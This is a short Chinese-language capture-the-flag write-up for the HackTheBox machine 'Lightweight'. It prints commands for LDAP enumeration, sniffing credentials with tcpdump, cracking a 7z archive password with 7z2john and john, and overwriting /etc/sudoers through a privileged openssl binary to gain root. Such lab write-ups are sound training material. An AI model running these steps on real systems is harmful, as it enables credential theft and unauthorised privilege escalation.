Lightweight - HackTheBox

nmap扫描

先看80

这边是说添加了一个账号到ssh，然后账号密码都是访问的IP地址

直接提权？

有一个tcpdump可以以管理员身份运行，但不能获取权限

这边还开放了389端口

ldapsearch -x -H ldap://10.10.10.119 -b "DC=lightweight,DC=htb" -s sub

貌似可以获得密码，用tcpdump来监听一下ldap协议的流量

tcpdump -i any -X port ldap

貌似这就是密码，切换账户

继续

在家目录下发现一个backup的压缩包，下到本地看看

报错，把压缩包进行个编码在下载

解压

7z e backup.7z

要密码，爆破一下

apt-get install liblzma-dev

cpan -i Compress::Raw::Lzma

https://github.com/philsmd/7z2hashcat

perl 7z2john.pl backup.7z >hash

在用john爆破

解压出了一堆php文件

另一个用户的密码

在家目录下发现一个openssl

可以用openssl写入一个sudo -l权限给一个用户

echo -ne "root\tALL=(ALL) ALL\n\"10.10.14.12\"\tALL=(ALL) ALL\n%sudo\tALL=(ALL) ALL\n" |base64 > ca

/home/ldapuser1/openssl base64 -d -in ca -out /etc/sudoers

在切换回10.10.14.12用户